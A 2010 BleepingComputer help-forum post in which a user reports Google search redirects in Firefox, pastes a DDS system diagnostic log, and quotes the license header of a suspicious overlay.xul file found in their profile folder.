Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Google Redirecting in Firefox


  • This topic is locked This topic is locked
7 replies to this topic

#1 gamemakerman2002

gamemakerman2002

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:11:27 PM

Posted 02 August 2010 - 02:32 PM

Every now and then when I click a link from my Google results page in Firefox 3.6.8 (it may be in other browsers as well) I get redirected to a different website that's based on what keywords I typed in and have to go back and re-click the link. Sometimes there's a redirect page inbetween so I have to manually select what page to go back to or it just keeps redirecting to the advertisement. Malwarebytes can't find anything and neither can Antivir. My hosts file doesn't have anything suspicious in it. I was infected with fake AV Soft a few weeks ago and I think I got rid of it but maybe this is residual of that?

For some reason I couldn't get gmer to work. It gives me the error message "C:Windowssystem32configsystem: The system cannot find the file specified." I tried disabling Antivir and running it as an administrator and running it in safe mode but got the same error message. I tried running defogger to see if CD emulation software was causing the problem but that didnt help either.


DDS (Ver_10-03-17.01) - NTFSX64
Run by Luke at 2:06:54.90 on Mon 08/02/2010
Internet Explorer: 8.0.7600.16385 BrowserJavaVersion: 1.6.0_21
Microsoft Windows 7 Ultimate 6.1.7600.0.1252.1.1033.18.4095.2177 [GMT -4:00]


============== Running Processes ===============

C:Windowssystem32wininit.exe
C:Windowssystem32lsm.exe
C:Windowssystem32svchost.exe -k DcomLaunch
C:Windowssystem32svchost.exe -k RPCSS
C:WindowsSystem32svchost.exe -k NetworkService
E:Program Files (x86)AMDAMD Fusion Utility for DesktopsFusionSVC.exe
C:Windowssystem32atiesrxx.exe
C:WindowsSystem32svchost.exe -k LocalServiceNetworkRestricted
C:WindowsSystem32svchost.exe -k LocalSystemNetworkRestricted
C:Windowssystem32svchost.exe -k netsvcs
C:Windowssystem32svchost.exe -k LocalService
C:Windowssystem32atieclxx.exe
C:WindowsSystem32spoolsv.exe
E:Program Files (x86)AviraAntiVir Desktopsched.exe
C:Windowssystem32svchost.exe -k LocalServiceNoNetwork
C:WindowsSysWOW64svchost.exe -k Akamai
E:Program Files (x86)AviraAntiVir Desktopavguard.exe
C:Program Files (x86)Common FilesAppleMobile Device SupportAppleMobileDeviceService.exe
C:Program Files (x86)BonjourmDNSResponder.exe
E:Program Files (x86)GameTrackerGSInGameService.exe
C:Program Files (x86)Common FilesLightScribeLSSrvc.exe
C:Program FilesMozyHomemozybackup.exe
E:Program Files (x86)CDBurnerXPNMSAccessU.exe
C:WindowsSysWOW64PnkBstrA.exe
C:WindowsSysWOW64PnkBstrB.exe
C:Program Files (x86)Common FilesProtexisLicense ServicePsiService_2.exe
E:Program FilesSandboxieSbieSvc.exe
C:Program Files (x86)Microsoft Application Virtualization Clientsftvsa.exe
C:Windowssystem32svchost.exe -k imgsvc
C:Program FilesMozyHomemozybackup.exe
C:Program Files (x86)Microsoft Application Virtualization Clientsftlist.exe
C:Windowssystem32taskhost.exe
C:Windowssystem32Dwm.exe
C:Program FilesMozyHomemozybackup.exe
C:WindowsExplorer.EXE
C:Windowssystem32taskeng.exe
C:WindowsDAODx.exe
E:Program Files (x86)ExtensisSuitcase Fusion 2FMCore.exe
C:Program Files (x86)Common FilesMicrosoft SharedVirtualization HandlerCVHSVC.EXE
E:Program Files (x86)AviraAntiVir Desktopavgnt.exe
C:Program Files (x86)ATI TechnologiesATI.ACECore-StaticMOM.exe
C:Windowssystem32svchost.exe -k NetworkServiceNetworkRestricted
C:Windowssystem32svchost.exe -k LocalServiceAndNoImpersonation
C:Program Files (x86)ATI TechnologiesATI.ACECore-StaticCCC.exe
C:Windowssystem32SearchIndexer.exe
C:Program FilesWindows Media Playerwmpnetwk.exe
C:WindowsSystem32svchost.exe -k LocalServicePeerNet
C:WindowsSystem32svchost.exe -k secsvcs
E:Program Files (x86)Mozilla Firefoxfirefox.exe
C:Windowssystem32svchost.exe -k bthsvcs
E:Program Files (x86)Mozilla Firefoxplugin-container.exe
C:Program FilesWIDCOMMBluetooth Softwarebtwdins.exe
C:Program FilesWIDCOMMBluetooth SoftwareBtTray.exe
C:Program FilesWIDCOMMBluetooth SoftwareBtStackServer.exe
C:Program FilesWIDCOMMBluetooth SoftwareBluetoothHeadsetProxy.exe
E:Program Files (x86)iTunesiTunes.exe
E:Program Files (x86)Last.fmLastFM.exe
C:Program FilesiPodbiniPodService.exe
C:Program Files (x86)Common FilesAdobeOOBEPDAppUWAAAM Updates Notifier.exe
C:WindowsSystem32svchost.exe -k swprv
C:Windowssystem32DllHost.exe
C:Windowssystem32DllHost.exe
F:UsersLukeDownloadsFirefox DownloadsInstallersdds.scr
C:Windowssystem32conhost.exe
C:Windowssystem32wbemwmiprvse.exe

============== Pseudo HJT Report ===============

uSearch Page = hxxp://www.bing.com/?pc=AVBR
uStart Page = hxxp://www.bing.com/?pc=AVBR
mLocal Page = c:windowssyswow64blank.htm
uInternet Settings,ProxyOverride = *.local
BHO: ContributeBHO Class: {074c1dc5-9320-4a9a-947d-c042949c6216} - e:program filesadobeadobe contribute cs5pluginsieplugincontributeieplugin.dll
BHO: Adobe PDF Link Helper: {18df081c-e8ad-4283-a596-fa578c2ebdc3} - c:program files (x86)common filesadobeacrobatactivexAcroIEHelperShim.dll
BHO: Google Toolbar Helper: {aa58ed58-01dd-4d91-8333-cf10577473f7} - c:program files (x86)googlegoogle toolbarGoogleToolbar_32.dll
BHO: Skype add-on for Internet Explorer: {ae805869-2e5c-4ed4-8f7b-f1f7851a4497} - c:program files (x86)skypetoolbarsinternet explorerskypeieplugin.dll
BHO: Google Toolbar Notifier BHO: {af69de43-7d58-4638-b6fa-ce66b5ad205d} - c:program files (x86)googlegoogletoolbarnotifier5.5.5126.1836swg.dll
BHO: Java™ Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:program files (x86)javajre6binjp2ssv.dll
TB: Contribute Toolbar: {517bdde4-e3a7-4570-b21e-2b52b6139fc7} - e:program filesadobeadobe contribute cs5pluginsieplugincontributeieplugin.dll
TB: Google Toolbar: {2318c2b1-4965-11d4-9b18-009027a5cd4f} - c:program files (x86)googlegoogle toolbarGoogleToolbar_32.dll
uRun: [AdobeBridge]
uRun: [FMCore.exe] "e:program files (x86)extensissuitcase fusion 2FMCore.exe" -standalone
mRun: [avgnt] "e:program files (x86)aviraantivir desktopavgnt.exe" /min
mRun: [ATICustomerCare] "c:program files (x86)atiaticustomercareATICustomerCare.exe"
mRun: [amd_dc_opt] c:program files (x86)amddual-core optimizeramd_dc_opt.exe
mRun: [StartCCC] "c:program files (x86)ati technologiesati.acecore-staticCLIStart.exe" MSRun
StartupFolder: c:progra~3micros~1windowsstartm~1programsstartupblueto~1.lnk - c:program fileswidcommbluetooth softwareBTTray.exe
uPolicies-explorer: DisallowRun = 1 (0x1)
uPolicies-disallowrun: 1 = avnotify.exe
mPolicies-explorer: NoActiveDesktop = 1 (0x1)
mPolicies-explorer: NoActiveDesktopChanges = 1 (0x1)
mPolicies-explorer: ForceActiveDesktopOn = 0 (0x0)
mPolicies-system: ConsentPromptBehaviorAdmin = 5 (0x5)
mPolicies-system: ConsentPromptBehaviorUser = 3 (0x3)
mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
IE: Google Sidewiki... - c:program files (x86)googlegoogle toolbarcomponentGoogleToolbarDynamic_mui_en_89D8574934B26AC4.dll/cmsidewiki.html
IE: Send image to &Bluetooth Device... - c:program fileswidcommbluetooth softwarebtsendto_ie_ctx.htm
IE: Send page to &Bluetooth Device... - c:program fileswidcommbluetooth softwarebtsendto_ie.htm
IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - c:program fileswidcommbluetooth softwarebtsendto_ie.htm
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - c:program files (x86)skypetoolbarsinternet explorerskypeieplugin.dll
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_21-windows-i586.cab
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - c:program files (x86)skypetoolbarsinternet explorerskypeieplugin.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:progra~2common~1skypeSKYPE4~1.DLL
mASetup: {10880D85-AAD9-4558-ABDC-2AB1552D831F} - "c:program files (x86)common fileslightscribeLSRunOnce.exe"
BHO-X64: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:program files (x86)googlegoogle toolbarGoogleToolbar_64.dll
BHO-X64: Google Toolbar Notifier BHO: {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - c:program filesgooglegoogletoolbarnotifier5.5.5126.1836swg64.dll
BHO-X64: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:program filesjavajre6binjp2ssv.dll
TB-X64: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:program files (x86)googlegoogle toolbarGoogleToolbar_64.dll
IE-X64: {CCA281CA-C863-46ef-9331-5C8D4460577F} - c:program fileswidcommbluetooth softwarebtsendto_ie.htm

================= FIREFOX ===================

FF - ProfilePath - c:userslukeappdataroamingmozillafirefoxprofilesw4mggrpi.default
FF - component: c:userslukeappdataroamingmozillafirefoxprofilesw4mggrpi.defaultextensionsstratabuddy@reduxteamcomponentsdwmxpcom.dll
FF - plugin: c:progra~2micros~3office14NPSPWRAP.DLL
FF - plugin: c:program files (x86)googlegoogle earthpluginnpgeplugin.dll
FF - plugin: c:program files (x86)googleupdate1.2.183.23npGoogleOneClick8.dll
FF - plugin: c:program files (x86)javajre6binnew_pluginnpdeployJava1.dll
FF - plugin: c:program files (x86)onlivefirefoxpluginnpolgdet.dll
FF - plugin: c:program files (x86)pando networksmedia boosternpPandoWebPlugin.dll
FF - plugin: c:program files (x86)photosynthnpPhotosynthMozilla.dll
FF - plugin: c:program files (x86)virtual earth 3dnpVE3D.dll
FF - plugin: c:userslukeappdatalocalgoogleupdate1.2.183.29npGoogleOneClick8.dll
FF - plugin: c:userslukeappdataroamingfacebooknpfbplugin_1_0_3.dll
FF - plugin: c:windowssyswow64macromedflashNPSWF32.dll
FF - plugin: e:program files (x86)adobereader 9.0readerbrowsernppdf32.dll
FF - plugin: e:program files (x86)divxdivx playernpDivxPlayerPlugin.dll
FF - plugin: e:program files (x86)divxdivx web playernpdivx32.dll
FF - plugin: e:program files (x86)itunesmozilla pluginsnpitunes.dll
FF - plugin: e:program files (x86)mozilla firefoxpluginsnp-mswmp.dll
FF - plugin: e:program files (x86)mozilla firefoxpluginsnpContribute.dll
FF - plugin: e:program files (x86)mozilla firefoxpluginsnpnul32.dll
FF - plugin: e:program files (x86)mozilla firefoxpluginsNPSibelius.dll
FF - plugin: e:program files (x86)quicktimepluginsnpqtplugin.dll
FF - plugin: e:program files (x86)quicktimepluginsnpqtplugin2.dll
FF - plugin: e:program files (x86)quicktimepluginsnpqtplugin3.dll
FF - plugin: e:program files (x86)quicktimepluginsnpqtplugin4.dll
FF - plugin: e:program files (x86)quicktimepluginsnpqtplugin5.dll
FF - plugin: e:program files (x86)quicktimepluginsnpqtplugin6.dll
FF - plugin: e:program files (x86)quicktimepluginsnpqtplugin7.dll
FF - plugin: e:program files (x86)videolanvlcnpvlc.dll
FF - HiddenExtension: Java Console: No Registry Reference - c:program files (x86)mozilla firefox 4.0 beta 1extensions{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBA}

============= SERVICES / DRIVERS ===============

R0 PxHlpa64;PxHlpa64;c:windowssystem32driversPxHlpa64.sys [2010-1-31 55280]
R2 Akamai;Akamai NetSession Interface;c:windowssystem32svchost.exe -k Akamai [2009-7-13 27136]
R2 AMD External Events Utility;AMD External Events Utility;c:windowssystem32atiesrxx.exe [2010-7-6 203264]
R2 AMDFusionSVC;AMD Fusion Utility Service;e:program files (x86)amdamd fusion utility for desktopsFusionSVC.exe [2009-9-8 383544]
R2 AntiVirSchedulerService;Avira AntiVir Scheduler;e:program files (x86)aviraantivir desktopsched.exe [2010-1-8 108289]
R2 AntiVirService;Avira AntiVir Guard;e:program files (x86)aviraantivir desktopavguard.exe [2010-1-8 185089]
R2 avgntflt;avgntflt;c:windowssystem32driversavgntflt.sys [2010-1-8 74880]
R2 cvhsvc;Client Virtualization Handler;c:program files (x86)common filesmicrosoft sharedvirtualization handlerCVHSVC.EXE [2009-9-26 819600]
R2 GS In-Game Service;GS In-Game Service;e:program files (x86)gametrackerGSInGameService.exe [2010-7-7 1648480]
R2 sftlist;Application Virtualization Client;c:program files (x86)microsoft application virtualization clientsftlist.exe [2009-9-23 447848]
R3 amdkmdag;amdkmdag;c:windowssystem32driversatikmdag.sys [2010-7-6 7195648]
R3 amdkmdap;amdkmdap;c:windowssystem32driversatikmpag.sys [2010-7-6 265728]
R3 btwl2cap;Bluetooth L2CAP Service;c:windowssystem32driversbtwl2cap.sys [2010-8-2 35104]
R3 RDID1046;UA-25;c:windowssystem32driversRdwm1046.sys [2010-1-8 199296]
R3 RTL8167;Realtek 8167 NT Driver;c:windowssystem32driversRt64win7.sys [2009-12-19 314400]
R3 SbieDrv;SbieDrv;e:program filessandboxieSbieDrv.sys [2010-7-4 139880]
R3 sftfs;sftfs;c:program files (x86)microsoft application virtualization clientdriversSftFSlh.sys [2009-9-23 712536]
R3 sftplay;sftplay;c:program files (x86)microsoft application virtualization clientdriverssftplaylh.sys [2009-9-23 261480]
R3 Sftredir;Sftredir;c:windowssystem32driversSftredirlh.sys [2009-9-23 25944]
R3 sftvol;sftvol;c:program files (x86)microsoft application virtualization clientdriversSftVollh.sys [2009-9-23 17752]
R3 sftvsa;Application Virtualization Service Agent;c:program files (x86)microsoft application virtualization clientsftvsa.exe [2009-9-23 203608]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:windowsmicrosoft.netframeworkv4.0.30319mscorsvw.exe [2010-3-18 130384]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:windowsmicrosoft.netframework64v4.0.30319mscorsvw.exe [2010-3-18 138576]
S2 gupdate;Google Update Service (gupdate);c:program files (x86)googleupdateGoogleUpdate.exe [2010-3-31 135664]
S3 DAUpdaterSvc;Dragon Age: Origins - Content Updater;e:program files (x86)dragon agebin_shipdaupdatersvc.service.exe [2010-1-18 25832]
S3 osppsvc;Office Software Protection Platform;c:program filescommon filesmicrosoft sharedofficesoftwareprotectionplatformOSPPSVC.EXE [2009-9-26 4924336]
S3 SwitchBoard;Adobe SwitchBoard;c:program files (x86)common filesadobeswitchboardSwitchBoard.exe [2010-2-19 517096]
S3 USBAAPL64;Apple Mobile USB Driver;c:windowssystem32driversusbaapl64.sys [2010-4-19 50688]
S3 WatAdminSvc;Windows Activation Technologies Service;c:windowssystem32watWatAdminSvc.exe [2010-4-3 1255736]

=============== Created Last 30 ================

2010-08-02 05:41:13 0 ----a-w- c:userslukedefogger_reenable
2010-08-02 04:31:44 35104 ----a-w- c:windowssystem32driversbtwl2cap.sys
2010-08-02 04:31:44 21160 ----a-w- c:windowssystem32driversbtwrchid.sys
2010-08-02 04:31:44 132648 ----a-w- c:windowssystem32driversbtwavdt.sys
2010-08-02 04:31:43 98344 ----a-w- c:windowssystem32driversbtwaudio.sys
2010-08-02 04:31:22 0 d-----w- c:program filesWIDCOMM
2010-08-02 04:28:00 32 ----a-w- c:windows0
2010-08-02 04:28:00 0 ----a-w- c:windowssyswow640
2010-08-02 01:05:28 0 d-----w- c:userslukeappdataroamingResourceCentral.E6E1B28A311BC518DB6C6883EA3757FDE0E90ADC.1
2010-08-02 01:03:00 0 d-----w- c:userslukeappdataroamingPACE Anti-Piracy
2010-08-02 01:03:00 0 d-----w- c:programdataPACE Anti-Piracy
2010-08-01 06:15:49 0 d-----w- c:userslukeappdataroamingFLV Extract
2010-07-30 22:13:03 0 d-----w- c:program filesDIFX
2010-07-28 00:58:28 0 d-----w- c:programdataATI
2010-07-24 20:08:04 0 d-----w- c:program files (x86)WinPcap
2010-07-22 20:46:29 0 d-----w- c:userslukeappdataroamingNCH Software
2010-07-22 20:44:56 0 d-----w- c:programdataNCH Swift Sound
2010-07-22 20:44:31 0 d-----w- c:program files (x86)NCH Swift Sound
2010-07-21 19:45:16 0 d-----w- c:program filesFebooti fileTweak Hash and CRC
2010-07-17 21:19:11 0 d-----w- c:program files (x86)Half Life 2
2010-07-17 00:58:11 0 dc-h--w- c:programdata{BC13C66E-D01E-4443-A1D1-35EEDF3A964A}
2010-07-17 00:58:07 0 d-----w- c:programdataNative Instruments
2010-07-17 00:58:04 0 dc-h--w- c:programdata{D7CFB71A-972A-44FF-AE44-8780EB53ABB2}
2010-07-17 00:58:02 0 d-----w- c:program filesNative Instruments
2010-07-17 00:58:02 0 d-----w- c:program filescommon filesNative Instruments
2010-07-16 21:38:08 0 d-----w- c:programdataSun
2010-07-16 21:37:59 423656 ----a-w- c:windowssyswow64deployJava1.dll
2010-07-16 21:37:59 153376 ----a-w- c:windowssyswow64javaws.exe
2010-07-16 21:37:59 145184 ----a-w- c:windowssyswow64javaw.exe
2010-07-16 21:37:59 145184 ----a-w- c:windowssyswow64java.exe
2010-07-16 07:02:49 0 d-----w- c:userslukeappdataroamingMael
2010-07-15 20:16:31 66040 ----a-w- c:windowssystem32driversmozy.sys
2010-07-15 20:16:30 0 d-----w- c:program filesMozyHome
2010-07-15 05:01:45 0 d-----w- c:program filesJava
2010-07-15 04:00:11 0 d-----w- c:userslukeappdataroamingTS3Client
2010-07-13 17:20:03 144384 ----a-w- c:windowssystem32cdd.dll
2010-07-11 00:07:29 0 d-----w- c:programdataInstallShield
2010-07-11 00:07:11 73728 ----a-w- c:windowssyswow64ISUSPM.cpl
2010-07-11 00:07:11 0 d-----w- c:program files (x86)M-Audio
2010-07-10 06:39:01 0 d-----w- c:program filesTeamSpeak 3 Client
2010-07-10 05:32:40 293 ----a-w- c:windowsgame.ini
2010-07-09 22:39:16 0 d-----w- c:program files (x86)Qtracker
2010-07-09 16:24:04 6402 ----a-w- c:windowsmozy.flt
2010-07-09 16:24:04 3264 ----a-w- c:windowsmozy.blk
2010-07-09 06:17:23 521 ----a-w- c:windowseReg.dat
2010-07-09 05:15:08 56 ---ha-w- c:programdataezsidmv.dat
2010-07-09 05:12:37 0 d-----r- c:program files (x86)Skype
2010-07-09 05:12:35 0 d-----w- c:programdataSkype
2010-07-09 00:48:57 0 d-----w- c:program files (x86)Mozilla Firefox 4.0 Beta 1
2010-07-08 03:07:21 0 d-----w- c:program filesRecuva
2010-07-07 06:43:08 0 d-----w- c:windowssystem32appmgmt
2010-07-07 05:57:43 0 d-----w- c:usersluke.idlerc
2010-07-07 04:34:44 0 d-----w- c:userslukeappdataroamingGameTracker
2010-07-07 02:30:08 7195648 ----a-w- c:windowssystem32driversatikmdag.sys
2010-07-07 02:16:20 20118528 ----a-w- c:windowssystem32atio6axx.dll
2010-07-07 01:55:08 15461888 ----a-w- c:windowssyswow64atioglxx.dll
2010-07-07 01:54:32 63416 ----a-w- c:windowssystem32atiapfxx.blb
2010-07-07 01:54:16 143360 ----a-w- c:windowssystem32atiapfxx.exe
2010-07-07 01:51:30 446464 ----a-w- c:windowssystem32ATIDEMGX.dll
2010-07-07 01:51:26 462336 ----a-w- c:windowssystem32atieclxx.exe
2010-07-07 01:50:54 203264 ----a-w- c:windowssystem32atiesrxx.exe
2010-07-07 01:49:48 120320 ----a-w- c:windowssystem32atitmm64.dll
2010-07-07 01:49:36 421376 ----a-w- c:windowssystem32atipdl64.dll
2010-07-07 01:49:28 356352 ----a-w- c:windowssyswow64atipdlxx.dll
2010-07-07 01:49:18 278528 ----a-w- c:windowssyswow64Oemdspif.dll
2010-07-07 01:49:14 12288 ----a-w- c:windowssystem32atimuixx.dll
2010-07-07 01:49:10 59392 ----a-w- c:windowssystem32atiedu64.dll
2010-07-07 01:49:06 43520 ----a-w- c:windowssyswow64ati2edxx.dll
2010-07-07 01:46:26 3826688 ----a-w- c:windowssyswow64atidxx32.dll
2010-07-07 01:30:12 2785792 ----a-w- c:windowssystem32atiumd6a.dll
2010-07-07 01:29:26 51200 ----a-w- c:windowssystem32aticalrt64.dll
2010-07-07 01:29:24 46080 ----a-w- c:windowssyswow64aticalrt.dll
2010-07-07 01:29:16 44544 ----a-w- c:windowssystem32aticalcl64.dll
2010-07-07 01:29:14 44032 ----a-w- c:windowssyswow64aticalcl.dll
2010-07-07 01:29:06 5378560 ----a-w- c:windowssystem32aticaldd64.dll
2010-07-07 01:27:58 4323840 ----a-w- c:windowssyswow64aticaldd.dll
2010-07-07 01:27:28 543664 ----a-w- c:windowssystem32atiumd6a.cap
2010-07-07 01:22:52 543664 ----a-w- c:windowssyswow64atiumdva.cap
2010-07-07 01:22:26 5099008 ----a-w- c:windowssystem32atiumd64.dll
2010-07-07 01:16:06 335872 ----a-w- c:windowssystem32atiadlxx.dll
2010-07-07 01:16:02 237568 ----a-w- c:windowssyswow64atiadlxy.dll
2010-07-07 01:15:54 14848 ----a-w- c:windowssystem32atig6pxx.dll
2010-07-07 01:15:50 12800 ----a-w- c:windowssyswow64atiglpxx.dll
2010-07-07 01:15:50 12800 ----a-w- c:windowssystem32atiglpxx.dll
2010-07-07 01:15:48 18432 ----a-w- c:windowssystem32atig6txx.dll
2010-07-07 01:15:46 16896 ----a-w- c:windowssyswow64atigktxx.dll
2010-07-07 01:15:42 265728 ----a-w- c:windowssystem32driversatikmpag.sys
2010-07-07 01:14:58 30208 ----a-w- c:windowssyswow64atiuxpag.dll
2010-07-07 01:14:50 30208 ----a-w- c:windowssystem32atiu9p64.dll
2010-07-07 01:14:16 53248 ----a-w- c:windowssystem32driversati2erec.dll
2010-07-07 01:11:12 54272 ----a-w- c:windowssystem32atimpc64.dll
2010-07-07 01:11:12 54272 ----a-w- c:windowssystem32amdpcom64.dll
2010-07-07 01:11:06 52736 ----a-w- c:windowssyswow64atimpc32.dll
2010-07-07 01:11:06 52736 ----a-w- c:windowssyswow64amdpcom32.dll
2010-07-06 20:48:52 0 d-----w- c:program files (x86)LucasArts
2010-07-05 18:33:44 0 d-----w- c:programdataPassmark
2010-07-05 18:33:44 0 d-----w- c:program filesPerformanceTest
2010-07-05 06:13:48 0 d-----w- c:userslukeappdataroamingAvant Profiles
2010-07-05 06:13:45 0 d-----w- c:program files (x86)Avant Browser

==================== Find3M ====================

2010-07-15 05:01:48 468480 ----a-w- c:windowssystem32deployJava1.dll
2010-07-10 23:35:49 214520 ----a-w- c:windowssyswow64PnkBstrB.exe
2010-07-07 01:54:08 513024 ----a-w- c:windowssyswow64aticfx32.dll
2010-07-07 01:53:20 594432 ----a-w- c:windowssystem32aticfx64.dll
2010-07-07 01:37:36 4463616 ----a-w- c:windowssystem32atidxx64.dll
2010-07-07 01:28:20 3975680 ----a-w- c:windowssyswow64atiumdag.dll
2010-07-07 01:24:34 55296 ----a-w- c:windowssystem32coinst.dll
2010-07-07 01:23:14 3058688 ----a-w- c:windowssyswow64atiumdva.dll
2010-07-07 01:15:04 39424 ----a-w- c:windowssystem32atiuxp64.dll
2010-07-07 01:14:44 22528 ----a-w- c:windowssyswow64atiu9pag.dll
2010-06-15 22:28:58 2857 ----a-w- c:windowssyswow64atipblag.dat
2010-06-15 22:28:58 2857 ----a-w- c:windowssystem32atipblag.dat
2010-05-31 05:22:40 156296 ---ha-w- c:windowssyswow64mlfcache.dat
2010-05-27 07:24:13 34304 ----a-w- c:windowssyswow64atmlib.dll
2010-05-27 06:34:09 46080 ----a-w- c:windowssystem32atmlib.dll
2010-05-27 04:11:32 366080 ----a-w- c:windowssystem32atmfd.dll
2010-05-27 03:49:37 293888 ----a-w- c:windowssyswow64atmfd.dll
2010-05-21 18:14:28 270208 ------w- c:windowssystem32MpSigStub.exe
2010-05-21 05:52:30 1192960 ----a-w- c:windowssystem32wininet.dll
2010-05-21 05:18:06 977920 ----a-w- c:windowssyswow64wininet.dll
2010-05-21 05:14:50 48128 ----a-w- c:windowssyswow64jsproxy.dll
2010-05-18 20:55:18 95520 ----a-w- c:windowssystem32dnssd.dll
2010-05-18 20:55:18 119584 ----a-w- c:windowssystem32dns-sd.exe
2010-05-18 20:35:16 91424 ----a-w- c:windowssyswow64dnssd.dll
2010-05-18 20:35:16 107808 ----a-w- c:windowssyswow64dns-sd.exe
2010-05-11 20:42:08 205156 ----a-w- c:windowssystem32atiicdxx.dat
2010-05-11 03:12:31 2828 --sha-w- c:programdataKGyGaAvL.sys
2010-05-09 09:46:00 961024 ----a-w- c:windowssystem32CPFilters.dll
2010-05-09 09:45:57 552960 ----a-w- c:windowssystem32msdri.dll
2010-05-09 09:14:55 641536 ----a-w- c:windowssyswow64CPFilters.dll
2010-05-06 12:42:05 1225216 ----a-w- c:windowssyswow64urlmon.dll
2010-05-06 12:41:55 606208 ----a-w- c:windowssyswow64mstime.dll
2010-05-06 12:41:53 64512 ----a-w- c:windowssyswow64msfeedsbs.dll
2010-05-06 12:41:53 5970944 ----a-w- c:windowssyswow64mshtml.dll
2010-05-06 12:41:49 381440 ----a-w- c:windowssyswow64iedkcs32.dll
2010-05-06 12:41:49 10984448 ----a-w- c:windowssyswow64ieframe.dll
2010-01-17 18:20:18 379286 ----a-w- c:program files (x86)UnGEXUSACAN.exe
2010-01-17 18:20:18 14 ----a-w- c:program files (x86)settings.cfg
2009-07-14 05:37:38 31548 ----a-w- c:windowsinfperflib0409perfd.dat
2009-07-14 05:37:38 31548 ----a-w- c:windowsinfperflib0409perfc.dat
2009-07-14 05:37:38 291294 ----a-w- c:windowsinfperflib0409perfi.dat
2009-07-14 05:37:38 291294 ----a-w- c:windowsinfperflib0409perfh.dat
2009-07-14 04:54:24 174 --sha-w- c:program filesdesktop.ini
2009-07-14 04:54:24 174 --sha-w- c:program files (x86)desktop.ini
2009-07-14 01:00:34 291294 ----a-w- c:windowsinfperflib0000perfi.dat
2009-07-14 01:00:34 291294 ----a-w- c:windowsinfperflib0000perfh.dat
2009-07-14 01:00:32 31548 ----a-w- c:windowsinfperflib0000perfd.dat
2009-07-14 01:00:32 31548 ----a-w- c:windowsinfperflib0000perfc.dat
2008-01-19 03:39:42 604 ---ha-w- c:program files (x86)STLL Notifier
2009-06-10 20:44:08 9633792 --sha-r- c:windowsfontsStaticCache.dat
2010-01-23 09:14:35 245760 --sha-w- c:windowsserviceprofilesnetworkserviceappdataroamingmicrosoftwindowsietldcacheindex.dat
2009-07-14 01:39:53 398848 --sha-w- c:windowswinsxsamd64_microsoft-windows-mail-app_31bf3856ad364e35_6.1.7600.16385_none_4d4d1f2f696639a2WinMail.exe
2009-07-14 01:14:45 396800 --sha-w- c:windowswinsxsx86_microsoft-windows-mail-app_31bf3856ad364e35_6.1.7600.16385_none_f12e83abb108c86cWinMail.exe

============= FINISH: 2:07:03.50 ===============

Alright, I think I found the problem on my own. There was a file in "C:UsersLukeAppDataLocal{54A99DBC-39B9-454A-A1A3-5E56906EF030}chromecontent" called overlay.xul that had the following code:
<?xml version="1.0" encoding="UTF-8"?>
<!--
/* ***** BEGIN LICENSE BLOCK *****
* Version: MPL 1.1/GPL 2.0/LGPL 2.1
*
* The contents of this file are subject to the Mozilla Public License Version
* 1.1 (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
* http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS IS" basis,
* WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
* for the specific language governing rights and limitations under the
* License.
*
* The Original Code is XULRunner.
*
* The Initial Developer of the Original Code is
*
* Einar Egilsson. (email: xulrunner@dev.mozilla.org)
*
* Portions created by the Initial Developer are Copyright 2006
* the Initial Developer. All Rights Reserved.
*
* Contributor(s):
*
* Alternatively, the contents of this file may be used under the terms of
* either the GNU General Public License Version 2 or later (the "GPL"), or
* the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
* in which case the provisions of the GPL or the LGPL are applicable instead
* of those above. If you wish to allow use of your version of this file only
* under the terms of either the GPL or the LGPL, and not to allow others to
* use your version of this file under the terms of the MPL, indicate your
* decision by deleting the provisions above and replace them with the notice
* and other provisions required by the GPL or the LGPL. If you do not delete
* the provisions above, a recipient may use your version of this file under
* the terms of any one of the MPL, the GPL or the LGPL.
*
* ***** END LICENSE BLOCK ***** */
-->
